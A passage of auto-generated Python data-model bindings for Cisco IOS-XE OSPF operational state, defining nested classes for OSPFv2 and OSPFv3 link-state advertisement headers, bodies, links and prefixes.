super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__()
self.yang_name = "flags"
self.yang_parent_name = "lsa-nssa-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
])
self.e_flag = None
self._segment_path = lambda: "flags"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value)
class LinkData(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData, self).__init__()
self.yang_name = "link-data"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])),
('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])),
('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])),
('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])),
])
self.rtr_priority = None
self.link_local_interface_address = None
self.num_of_prefixes = None
self.lsa_id_options = Bits()
self._segment_path = lambda: "link-data"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value)
class IaPrefix(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix, self).__init__()
self.yang_name = "ia-prefix"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])),
('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])),
])
self.referenced_ls_type = None
self.referenced_link_state_id = None
self.referenced_adv_router = None
self.num_of_prefixes = None
self._segment_path = lambda: "ia-prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value)
class Ospfv3Link(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Link, self).__init__()
self.yang_name = "ospfv3-link"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])),
('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])),
('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])),
('type', (YLeaf(YType.uint8, 'type'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.interface_id = None
self.neighbor_interface_id = None
self.neighbor_router_id = None
self.type = None
self.metric = None
self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value)
class Ospfv3Prefix(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Prefix, self).__init__()
self.yang_name = "ospfv3-prefix"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['prefix']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
])
self.prefix = None
self.prefix_options = None
self._segment_path = lambda: "ospfv3-prefix" + "[prefix='" + str(self.prefix) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Prefix, ['prefix', 'prefix_options'], name, value)
class Ospfv3IaPrefix(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3IaPrefix, self).__init__()
self.yang_name = "ospfv3-ia-prefix"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['prefix']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
])
self.prefix = None
self.prefix_options = None
self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value)
class LinkScopeLsas(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas, self).__init__()
self.yang_name = "link-scope-lsas"
self.yang_parent_name = "ospf-instance"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['lsa_type']
self._child_classes = OrderedDict([("link-scope-lsa", ("link_scope_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa)), ("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa))])
self._leafs = OrderedDict([
('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
])
self.lsa_type = None
self.link_scope_lsa = YList(self)
self.area_scope_lsa = YList(self)
self._segment_path = lambda: "link-scope-lsas" + "[lsa-type='" + str(self.lsa_type) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas, ['lsa_type'], name, value)
class LinkScopeLsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa, self).__init__()
self.yang_name = "link-scope-lsa"
self.yang_parent_name = "link-scope-lsas"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['lsa_id','adv_router']
self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2External)), ("ospfv2-unknown-tlv", ("ospfv2_unknown_tlv", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv)), ("ospfv3-lsa-val", ("ospfv3_lsa_val", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3Link)), ("ospfv3-prefix-list", ("ospfv3_prefix_list", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix)), ("multi-topology", ("multi_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.MultiTopology)), ("tlv", ("tlv", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv)), ("unknown-sub-tlv", ("unknown_sub_tlv", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.UnknownSubTlv))])
self._leafs = OrderedDict([
('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])),
('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])),
('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])),
('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])),
('version', (YLeaf(YType.uint32, 'version'), ['int'])),
('router_address', (YLeaf(YType.str, 'router-address'), ['str','str'])),
])
self.lsa_id = None
self.adv_router = None
self.decoded_completed = None
self.raw_data = []
self.version = None
self.router_address = None
self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa()
self.ospfv2_lsa.parent = self
self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa"
self.ospfv3_lsa_val = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal()
self.ospfv3_lsa_val.parent = self
self._children_name_map["ospfv3_lsa_val"] = "ospfv3-lsa-val"
self.tlv = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv()
self.tlv.parent = self
self._children_name_map["tlv"] = "tlv"
self.ospfv2_link = YList(self)
self.ospfv2_topology = YList(self)
self.ospfv2_external = YList(self)
self.ospfv2_unknown_tlv = YList(self)
self.ospfv3_link = YList(self)
self.ospfv3_prefix_list = YList(self)
self.ospfv3_ia_prefix = YList(self)
self.multi_topology = YList(self)
self.unknown_sub_tlv = YList(self)
self._segment_path = lambda: "link-scope-lsa" + "[lsa-id='" + str(self.lsa_id) + "']" + "[adv-router='" + str(self.adv_router) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa, ['lsa_id', 'adv_router', 'decoded_completed', 'raw_data', 'version', 'router_address'], name, value)
class Ospfv2Lsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, self).__init__()
self.yang_name = "ospfv2-lsa"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody))])
self._leafs = OrderedDict()
self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header()
self.header.parent = self
self._children_name_map["header"] = "header"
self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody()
self.lsa_body.parent = self
self._children_name_map["lsa_body"] = "lsa-body"
self._segment_path = lambda: "ospfv2-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, [], name, value)
class Header(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, self).__init__()
self.yang_name = "header"
self.yang_parent_name = "ospfv2-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])),
('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])),
('age', (YLeaf(YType.uint16, 'age'), ['int'])),
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])),
])
self.lsa_id = None
self.opaque_type = None
self.opaque_id = None
self.age = None
self.type = None
self.adv_router = None
self.seq_num = None
self.checksum = None
self.length = None
self.flag_options = Bits()
self._segment_path = lambda: "header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value)
class LsaBody(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, self).__init__()
self.yang_name = "lsa-body"
self.yang_parent_name = "ospfv2-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network))])
self._leafs = OrderedDict([
('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])),
('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])),
('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])),
('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])),
])
self.num_of_links = None
self.summary_mask = None
self.external_mask = None
self.body_flag_options = Bits()
self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network()
self.network.parent = self
self._children_name_map["network"] = "network"
self._segment_path = lambda: "lsa-body"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value)
class Network(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__()
self.yang_name = "network"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])),
('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
])
self.network_mask = None
self.attached_router = []
self._segment_path = lambda: "network"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value)
class Ospfv2Link(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link, self).__init__()
self.yang_name = "ospfv2-link"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['link_id','link_data']
self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology))])
self._leafs = OrderedDict([
('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
('type', (YLeaf(YType.uint8, 'type'), ['int'])),
])
self.link_id = None
self.link_data = None
self.type = None
self.ospfv2_topology = YList(self)
self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value)
class Ospfv2Topology(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__()
self.yang_name = "ospfv2-topology"
self.yang_parent_name = "ospfv2-link"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.mt_id = None
self.metric = None
self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value)
class Ospfv2Topology(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Topology, self).__init__()
self.yang_name = "ospfv2-topology"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.mt_id = None
self.metric = None
self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value)
class Ospfv2External(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2External, self).__init__()
self.yang_name = "ospfv2-external"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
])
self.mt_id = None
self.metric = None
self.forwarding_address = None
self.external_route_tag = None
self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value)
class Ospfv2UnknownTlv(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, self).__init__()
self.yang_name = "ospfv2-unknown-tlv"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['type']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
('value', (YLeafList(YType.uint8, 'value'), ['int'])),
])
self.type = None
self.length = None
self.value = []
self._segment_path = lambda: "ospfv2-unknown-tlv" + "[type='" + str(self.type) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, ['type', 'length', 'value'], name, value)
class Ospfv3LsaVal(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, self).__init__()
self.yang_name = "ospfv3-lsa-val"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody))])
self._leafs = OrderedDict()
self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header()
self.header.parent = self
self._children_name_map["header"] = "header"
self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody()
self.lsa_body.parent = self
self._children_name_map["lsa_body"] = "lsa-body"
self._segment_path = lambda: "ospfv3-lsa-val"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, [], name, value)
class Header(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, self).__init__()
self.yang_name = "header"
self.yang_parent_name = "ospfv3-lsa-val"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader))])
self._leafs = OrderedDict([
('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])),
])
self.lsa_id = None
self.lsa_hdr_options = Bits()
self.lsa_header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader()
self.lsa_header.parent = self
self._children_name_map["lsa_header"] = "lsa-header"
self._segment_path = lambda: "header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, ['lsa_id', 'lsa_hdr_options'], name, value)
class LsaHeader(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, self).__init__()
self.yang_name = "lsa-header"
self.yang_parent_name = "header"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('age', (YLeaf(YType.uint16, 'age'), ['int'])),
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
])
self.age = None
self.type = None
self.adv_router = None
self.seq_num = None
self.checksum = None
self.length = None
self._segment_path = lambda: "lsa-header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value)
class LsaBody(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, self).__init__()
self.yang_name = "lsa-body"
self.yang_parent_name = "ospfv3-lsa-val"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix))])
self._leafs = OrderedDict([
('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])),
('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])),
])
self.lsa_flag_options = Bits()
self.lsa_body_flags = Bits()
self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network()
self.network.parent = self
self._children_name_map["network"] = "network"
self.prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix()
self.prefix.parent = self
self._children_name_map["prefix"] = "prefix"
self.ia_router = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter()
self.ia_router.parent = self
self._children_name_map["ia_router"] = "ia-router"
self.lsa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal()
self.lsa_external.parent = self
self._children_name_map["lsa_external"] = "lsa-external"
self.nssa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa()
self.nssa.parent = self
self._children_name_map["nssa"] = "nssa"
self.link_data = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData()
self.link_data.parent = self
self._children_name_map["link_data"] = "link-data"
self.ia_prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix()
self.ia_prefix.parent = self
self._children_name_map["ia_prefix"] = "ia-prefix"
self._segment_path = lambda: "lsa-body"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value)
class Network(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, self).__init__()
self.yang_name = "network"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
